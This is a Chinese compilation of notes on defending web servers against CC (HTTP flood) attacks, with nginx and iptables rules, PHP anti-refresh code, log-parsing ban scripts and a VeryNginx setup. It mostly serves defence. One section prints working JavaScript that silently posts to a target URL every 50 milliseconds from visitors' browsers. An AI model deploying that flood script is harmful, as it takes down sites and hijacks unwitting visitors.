最著名的就是CC攻击了,事实上,CC攻击最直观的名字应该叫做Http Get Flood攻击,它是专门针对Web服务器,由大量的代理服务器或者僵尸主机对Web服务器发起,不断对某个页面进行Http Get请求,消耗Web服务器的资源,最终导致Web服务器无法响应正常用户的请求。
CCKiller Linux轻量级CC攻击防御工具脚本 && GITHUB && Ubuntu
CentOS 7 安装 fail2ban + Firewalld 防止爆破与 CC 攻击
VPS屏蔽国外IP访问防止CC攻击
Linux VPS一键屏蔽指定国家所有的IP访问
上干货,VPS屏蔽国外IP访问脚本
https://github.com/17mon/china_ip_list
Nginx反向代理 URL【参数】转换为URL 【Path】,支持Post请求
Nginx反向代理解决前后端联调跨域问题
配置 Nginx 的限速和限流功能
Nginx
rewrite ^/(.*.txt)$ /mp/$1 break;
VeryNginx的GitHub地址: https://github.com/alexazhou/VeryNginx
VeryNginx 基于 lua_nginx_module(openrestry) 开发,实现了高级的防火墙、访问统计和其他的一些功能。 强化了 Nginx 本身的功能,并提供了友好的 Web 交互界面。
VeryNginx在线演示地址: http://alexazhou.xyz/vn/index.html
用户名 / 密码: verynginx / verynginx
下面的安装教程是基于CentOS 6 64位系统进行的
yum install -y gcc gcc-c++ make cmake autoconf libjpeg libjpeg-devel libpng libpng-devel freetype freetype-devel libxml2 libxml2-devel zlib zlib-devel glibc glibc-devel glib2 glib2-devel bzip2 bzip2-devel ncurses ncurses-devel libaio readline-devel curl curl-devel e2fsprogs e2fsprogs-devel krb5-devel libidn libidn-devel openssl openssl-devel libxslt-devel libicu-devel libevent-devel libtool libtool-ltdl bison gd-devel vim-enhanced pcre-devel zip unzip ntpdate sysstat patch bc expect rsync git lsof lrzsz
进入/tmp目录
cd /tmp/
下载OpenResty
wget https://openresty.org/download/ngx_openresty-1.9.7.1.tar.gz
解压OpenResty
tar -xvzf ngx_openresty-1.9.7.1.tar.gz
进入OpenResty源代码目录
cd ngx_openresty-1.9.7.1
配置configure及变量信息
./configure --prefix=/usr/local/openresty --user=nginx --group=nginx --with-http_stub_status_module --with-luajit
编译安装OpenResty
gmake && gmake install
退回到/tmp目录中
cd ..
克隆VeryNginx
git clone https://github.com/alexazhou/VeryNginx.git
删除OpenResty中的nginx.conf默认配置文件
rm -rf /usr/local/openresty/nginx/conf/nginx.conf
下载VeryNginx的nginx.conf配置文件
wget https://dl.m69w.com/scripts/nginx.conf -O /usr/local/openresty/nginx/conf/nginx.conf
复制VeryNginx到OpenResty中
cp -r ~/VeryNginx/VeryNginx /usr/local/openresty/VeryNginx
修改/usr/local/openresty/目录的所有者为nginx用户
chown -R nginx:nginx /usr/local/openresty/
启动VeryNginx
/usr/local/openresty/nginx/sbin/nginx
打开浏览器访问 http://你的服务器IP/VeryNginx/index.html
默认用户名和密码是 verynginx / verynginx
登录之后就可以查看状态,并对配置进行修改了。修改配置后,记得到 「Config > System > All Configuration」去保存.
如果需要详细的配置说明,请查看 VeryNginx Wiki
相关:
https://github.com/jgmdev/ddos-deflate(说明)
Linux被DDOS&CC攻击解决实例
通过nginx配置文件抵御攻击
防CC的收集以及实现基于js的CC攻击
<?php
session_start();
$k=$_GET['k'];
$t=$_GET['t'];
$allowTime = 1800;//防刷新时间
$ip = get_client_ip();
$allowT = md5($ip.$k.$t);
if(!isset($_SESSION[$allowT]))
{
$refresh = true;
$_SESSION[$allowT] = time();
}elseif(time() - $_SESSION[$allowT]>$allowTime){
$refresh = true;
$_SESSION[$allowT] = time();
}else{
$refresh = false;
}
?>
<?php
session_start();
$allow_sep = "2";
if (isset($_SESSION["post_sep"])){
if (time() - $_SESSION["post_sep"] < $allow_sep){
exit("请不要频繁刷新,休息2秒再刷新吧");
}
else{
$_SESSION["post_sep"] = time();
}
}
else{
$_SESSION["post_sep"] = time();
}
?>
<?
session_start();
if(!empty($_POST[name])){
$data = $_POST[name];
$tag = $_POST[tag];
if($_SESSION[status]==$tag){
echo $data;
}else{
echo "不允许刷新!";
}
}
$v = mt_rand(1,10000);
?>
<form method="post" name="magic" action="f5.php"><input type="hidden"
name="tag" value="<?=$v?>"><input type=text name="name"><input type="submit" value="submit">
</form>
<?
echo $v;
$_SESSION[status] = $v;
?>
通过分析nginx的access日志看到,该攻击的访问没有 user-agent ,然后果断出击,通过配置nginx
if ($http_x_forwarded_for ~ 223.4.121.225){
return 403;
}
if ($http_user_agent=""){
return 403;
}
将ip为223.4.121.225 这个攻击源的和user-agent 为空的,全部干掉,
重启nginx,拦截成功。
https://github.com/loveshell/ngx_lua_waf
LNMP简单的一些防CC的办法
观看生成的.log日志文件,判断来路,直接301百度:
if ($http_referer ~* mi5.gov ) {
rewrite ^(.*)$ http://www.baidu.com/ permanent;
}
观看生成的.log日志文件,判断浏览器特征码,直接301百度:
if ($http_user_agent ~* firefox4.0 ) {
rewrite ^(.*)$ http://www.baidu.com/ permanent;
}
根据特征码,直接查找.log文件,并iptables封死相应IP:
cat com.log | grep 'Mozilla/5.0' | awk '{print "iptables -I INPUT -p tcp --dport 80 -s ", $1, "-j DROP"}'| sort -n | uniq | sh
如192.241.x.x – – [07/Apr/2016:12:22:44 +0800] “GET /index.php HTTP/1.0″ 200 “-” “WordPress/3.9.2; http://www.x.x; verifying pingback from 69.30.x.x” “-“
这里很明显,全部都是Wordpress。下面我们给出防护nginx,apache的防护方案教程(请根据自己的WEB服务器判断是哪一种):
在location /区块种添加如下代码:
# WordPress Pingback Request Denial
if ($http_user_agent ~* “WordPress”) {
return 403;
}
这样的话有请求也不会去找PHP了,nginx及时的返回403,如果连接过多的话需要修改nginx中 worker_connections的参数值,可以把它增加到更大的值。
在配置文件中添加:
BrowserMatchNoCase WordPress wordpress_ping
BrowserMatchNoCase WordPress wordpress_ping
Order Deny,Allow
Deny from env=wordpress_ping
然后reload服务。再观察日志,可以看到全部返回403了。网站也恢复了正常访问。
如果上面的方法还是无法正常访问那就需要用到iptables了。
cat /var/log/nginx/access.log | grep “verifying pingback from” > pingback_attack.log
然后用php分析日志,导入到iptables规则中。
<?php
error_reporting(0);
$reqs = file(“pingback_attack.log”);
foreach ($reqs as $req) {
$ip = explode(” – – “, $req);
$ip_address[$ip[0]]++;
}
arsort($ip_address);
foreach ($ip_address as $ip=>$attack_times) {
print “# WordPress IP. Attacked {$attack_times} times<br />”;
print “iptables -A INPUT -s {$ip} -j DROP<br />”;
}
?>
然后将输出的内容执行到iptables规则里面。
功能:
1.读取 nginx/log/access.log 最后一条
2.如果包含 MISE ,则将此条目中的IP地址加入 Iptables规则
tail -n 1 nginx/log/access.log | grep MSIE | awk '{print $1}' | xargs -i iptables -I INPUT -s {}/32 -j DROP
脚本sh
#!/bin/bash
logfile=
while true
do
tail -1 a | grep -sq MISE
if [[ "$?" -eq 0 ]];then
ip=$(tail -1 "$logfile" | grep -oE "([[:digit:]]{1,3}\.){3}[[:digit:]]{1,3}")
echo $ip
fi
sleep 5
done
用iptables自动封连接数较大的IP防CC
此脚本用于分析统计secure日记文件,对ssh登录错误次数较多的IP用iptables封掉。
#!/bin/bash
#Created by http://www.onovps.com www.2cto.com
num=10 #上限
for i in `awk '/Failed/{print $(NF-3)}' /var/log/securesortuniq -csort -rnawk '{if ($1>$num){print $2}}'`
do
iptables -I INPUT -p tcp -s $i --dport 22 -j DROP
done
加入crontab计划任务
crontab -e
* */5 * * * sh /path/file.sh #5小时执行一次
介绍linux中Iptables限制同一IP连接数防CC/DDOS攻击方法,这个只是最基于的防止方法,如果真正的攻击我们还是需要硬件耿防止哦。
1.限制与80端口连接的IP最大连接数为10,可自定义修改。
代码如下
iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j DROP
#默认iptables模块不包含connlimit,需要自己单独编译加载
参考iptables防DDOS攻击和CC攻击设置
from http://blog.onovps.com/archives/linux-iptables-cc.html
2.使用recent模块限制同IP时间内新请求连接数,recent更多功能请参考:Iptables模块recent应用。
代码如下
iptables -A INPUT -p tcp --dport 80 --syn -m recent --name webpool --rcheck --seconds 60 --hitcount 10 -j LOG --log-prefix 'DDOS:' --log-ip-options
#60秒10个新连接,超过记录日志。
iptables -A INPUT -p tcp --dport 80 --syn -m recent --name webpool --rcheck --seconds 60 --hitcount 10 -j DROP
#60秒10个新连接,超过丢弃数据包。
iptables -A INPUT -p tcp --dport 80 --syn -m recent --name webpool --set -j ACCEPT
#范围内允许通过。
下面的是某一次CC攻击时的User-agent,Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)Cache-Control: no-store, must-revalidate几乎没有正常的浏览器会在User-agent中带上must-revalidate这样的关键字。所以我们可以以这个为特征进行过滤,将User-agent中带有must-revalidate的请求全部拒绝访问:
if ($http_user_agent ~ must-revalidate) {
return 403;
}
nginx过滤无聊的pingback CC请求
if ($http_user_agent ~* (ApacheBench|pingback|WordPress|MJ12bot|AhrefsBot|360JK|PHP|php|Jorgee) ) {return 101;}
if ($http_user_agent = "" ) {return 101;}
if ( $request = "POST /reg.html HTTP/1.1" ) {return 400;}
if ( $request = "POST / HTTP/1.1" ) {return 400;}
if ( $request = "POST / HTTP/1.0" ) {return 400;}
if ( $request = "POST // HTTP/1.0" ) {return 400;}
http{
...
limit_zone one $binary_remote_addr 10m;
...
server{
listen 80;
....
location/{
limit_conn one 5; #限制连接数
limit_rate 500k; # 限制速度
}
}
上面的相对比较简单,下面我来分析更具体的配置方法。CentOS/Redhat/Fedora
在服务器执行
代码如下
vi /etc/sysconfig/iptables
删除原来的内容输入如下内容,保存
# Generated by iptables-save v1.3.5 on Sun Dec 12 23:55:59 2010
*filter
:INPUT DROP [385263:27864079]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [4367656:3514692346]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state –state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p icmp -j ACCEPT
-A INPUT -s 127.0.0.1 -j ACCEPT
-A INPUT -p tcp -m tcp –dport 80 -m state –state NEW -m recent –set –name WEB –rsource
-A INPUT -p tcp -m tcp –dport 80 -m state –state NEW -m recent –update –seconds 5 –hitcount 20 –rttl –name WEB –rsource -j DROP
-A INPUT -p tcp -m multiport –ports 21,22,80 -j ACCEPT
-A INPUT -p tcp -m tcp –tcp-flags SYN,RST,ACK SYN -m ttl –ttl-eq 117 -j DROP
-A INPUT -p tcp -m tcp –tcp-flags SYN,RST,ACK SYN -m length –length 0:40 -j DROP
-A INPUT -p tcp -m tcp ! –tcp-flags SYN,RST,ACK SYN -m state –state NEW -j DROP
COMMIT
# Completed on Sun Dec 12 23:55:59 2010
说明此设定仅对外开放21(FTP),22(SSH),80(http网站)三个TCP端口。设置80端口5秒内20个连接
重启iptables服务 /etc/init.d/iptables restart
设定iptables随机启动chkconfig iptables on
下面是ajax攻击代码,间隔时间可以根据需要自己调整,设置的是50毫秒一次。
<script type="text/javascript">
var t_postdata='id=cacacacacacacaca';//数据越大效果越好。
var t_url='http://www.xxx.com/test.php';
function c_xmlHttp(){
if(window.ActiveXObject){
xmlHttp=new ActiveXObject('Microsoft.XMLHTTP');
}
else if(window.XMLHttpRequest)
{
xmlHttp=new XMLHttpRequest();
}
return xmlHttp;
}
function post_send(){
var xmlHttp=c_xmlHttp();
xmlHttp.open("POST",t_url,true);
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlHttp.send(t_postdata);
r_send();
}
function r_send(){
setTimeout("post_send()", 50);//50毫秒一次
}
if(!+[1,])//IE下不执行。
{var fghj=1;}
else
{setTimeout("post_send()", 3000);}//访问网站3秒后再执行,这样用户就毫无感觉。
</script>
| 正则表达式匹配 | 说明 |
|---|---|
| * ~ | 为区分大小写匹配 |
| ~ | 为不区分大小写匹配 |
| !~和!~ | 分别为区分大小写不匹配及不区分大小写不匹配 |
| 文件及目录匹配 | 说明 |
|---|---|
| * -f和!-f | 用来判断是否存在文件 |
| * -d和!-d | 用来判断是否存在目录 |
| * -e和!-e | 用来判断是否存在文件或目录 |
| * -x和!-x | 用来判断文件是否可执行 |
| flag标记 | 说明 |
|---|---|
| * last | 相当于Apache里的[L]标记,表示完成rewrite |
| * break | 终止匹配, 不再匹配后面的规则 |
| * redirect | 返回302临时重定向 地址栏会显示跳转后的地址 |
| * permanent | 返回301永久重定向 地址栏会显示跳转后的地址 |
| 一些可用的全局变量 | 可以用做条件判断 |
|---|---|
| $args | 请求中的参数; |
| $content_length | HTTP请求信息里的"Content-Length"; |
| $content_type | 请求信息里的"Content-Type"; |
| $document_root | 针对当前请求的根路径设置值; |
| $document_uri | 与$uri相同; |
| $host | 请求信息中的"Host",如果请求中没有Host行,则等于设置的服务器名; |
| $limit_rate | 对连接速率的限制; |
| $request_method | 请求的方法,比如"GET"、"POST"等; |
| $remote_addr | 客户端地址; |
| $remote_port | 客户端端口号; |
| $remote_user | 客户端用户名,认证用; |
| $request_filename | 当前请求的文件路径名 |
| $request_body_file | |
| $request_uri | 请求的URI,带查询字符串; |
| $query_string | 与$args相同; |
| $scheme | 所用的协议,比如http或者是https,比如rewrite ^(.+)$ $scheme://example.com$1 redirect; |
| $server_protocol | 请求的协议版本,"HTTP/1.0"或"HTTP/1.1"; |
| $server_addr | 服务器地址,如果没有用listen指明服务器地址,使用这个变量将发起一次系统调用以取得地址(造成资源浪费); |
| $server_name | 请求到达的服务器名; |
| $server_port | 请求到达的服务器端口号; |
| $uri | 请求的URI,可能和最初的值有不同,比如经过重定向之类的。 |
相关
介绍几种用Linux命令判断CC攻击的方法
Linux系统防CC攻击自动拉黑IP增强版Shell脚本
CCKiller:Linux轻量级CC攻击防御工具,秒级检查、自动拉黑和释放
Nginx抗CC攻击基础篇:VeryNginx
通过 nginx 配置文件抵御攻击
来自张戈博客的:Linux系统防CC攻击自动拉黑IP增强版Shell脚本
前天写的Shell脚本是加入到crontab计划任务执行的,每5分钟执行一次,今天实际测试了下,可还是可以用的,但是感觉5分钟时间有点过长,无法做到严密防护。于是稍微改进了下代码,现在简单的分享下!
#!/bin/bash
#Author:ZhangGe
#Desc:Auto Deny Black_IP Script.
#Date:2014-11-05
#取得参数$1为并发阈值,若留空则默认允许单IP最大50并发(实际测试发现,2M带宽,十来个并发服务器就已经无法访问了!)
if [[ -z $1 ]];then
num=50
else
num=$1
fi
#巧妙的进入到脚本工作目录
cd $(cd $(dirname $BASH_SOURCE) && pwd)
#请求检查、判断及拉黑主功能函数
function check(){
iplist=`netstat -an |grep ^tcp.*:80|egrep -v 'LISTEN|127.0.0.1'|awk -F"[ ]+|[:]" '{print $6}'|sort|uniq -c|sort -rn|awk -v str=$num '{if ($1>str){print $2}}'`
if [[ ! -z $iplist ]];
then
>./black_ip.txt
for black_ip in $iplist
do
#白名单过滤中已取消IP段的判断功能,可根据需要自行修改以下代码(请参考前天写的脚本)
#exclude_ip=`echo $black_ip | awk -F"." '{print $1"."$2"."$3}'`
#grep -q $exclude_ip ./white_ip.txt
grep -q $black_ip ./white_ip.txt
if [[ $? -eq 0 ]];then
echo "$black_ip (white_ip)" >>./black_ip.txt
else
echo $black_ip >>./black_ip.txt
iptables -nL | grep $black_ip ||(iptables -I INPUT -s $black_ip -j DROP & echo "$black_ip `date +%Y-%m-%H:%M:%S`">>./deny.log & echo 1 >./sendmail)
fi
done
#存在并发超过阈值的单IP就发送邮件
if [[ `cat ./sendmail` == 1 ]];then sendmsg;fi
fi
}
#发邮件函数
function sendmsg(){
netstat -nutlp | grep "sendmail" >/dev/null 2>&1 || /etc/init.d/sendmail start >/dev/null 2>&1
echo -e "From: 发邮件地址@qq.com\nTo:收邮件地址@qq.com\nSubject:Someone Attacking your system!!\nIts Ip is" >./message
cat ./black_ip.txt >>./message
/usr/sbin/sendmail -f 发邮件地址@qq.com -t 收邮件地址@qq.com -i <./message
>./sendmail
}
#间隔10s无限循环检查函数
while true
do
check
#每隔10s检查一次,时间可根据需要自定义
sleep 10
done将以上代码保存为deny_blackip.sh之后,进入到脚本文件所在目录,然后使用如下命令后台执行脚本(后面的50表示并发数,可自行调整):
nohup ./deny_blackip.sh 50 &执行后会出现如下信息:
[root@Mars_Server iptables]# nohup ./deny_blackip.sh 50 &
[1] 23630
[root@Mars_Server iptables]# nohup: ignoring input and appending output to `nohup.out'表示如果脚本产生输出信息,将会写入到nohup.out文件,可以看到当前目录已经生成了一个空的nohup.out:
[root@Mars_Server iptables]# ll nohup.out
-rw------- 1 root root 0 Nov 5 21:15 nohup.out好了,现在你执行执行ps aux 应该可以找到如下进程:
root 23630 0.0 0.2 5060 1224 pts/0 S 21:15 0:00 /bin/bash ./deny_blackip.sh
root 23964 0.0 0.0 4064 508 pts/0 S 21:19 0:00 sleep 10一切顺利!每10s将检查一次服务器请求,如果某个IP超过50个并发,立即拉黑,并发一封邮件给你!
测试很简单,先使用nohup启动脚本,然后在另一台Linux或Windows安装webbench,然后模拟50+并发去抓取该服务器的某个页面,20s之内可见到效果,下面是我的测试截图:
①、模拟CC攻击的服务器截图:
②、被CC攻击的服务器截图:
③、攻击IP被拉黑后的报警邮件:
测试时,模拟55个并发攻击了20s,立马就被拉黑了,效果很明显!
①、脚本发邮件需要安装sendmail,若未安装请执行yum -y install sendmail安装并启动即可;
②、若要停止后台运行的脚本,只要使用ps aux命令找到该脚本的pid线程号,然后执行kill -9 pid号即可结束;
③、关于脚本的单IP并发限制,我实际测试同时打开博客多个页面并持续刷新,顶多也就产生十来个并发,所以单IP超过50个并发就已经有很大的问题了!当然,文章的阈值设为50也只是建议值,你可以根据需求自行调整(如果网站静态文件未托管到CDN,那么一个页面可能存在10多个并发);
④、写这个脚本,主要是为了弥补用crontab执行时间间隔最低只能是1分钟的不足,可以让CC防护更严密,甚至每隔1S执行一次!虽说脚本不怎么占用资源,不过还是建议10s执行一次为佳,不用太过极端是吧?
⑤、对于白名单过滤,只要将白名单IP保存到脚本同一目录下的white_ip.txt文件中即可,若发现攻击IP在白名单中,脚本不会直接拉黑,而是发一封邮件给你,让你自己判断这个白名单攻击你是为毛?如果白名单需要支持IP段,请参考我前天写的脚本即可。
就啰嗦这么多,主要还是自己用,然后分享出来给有需要的人一些参考,个人vps服务器虽说很少有人攻击,但是基本的安装防护还是必须要做的!希望本文对你有所帮助!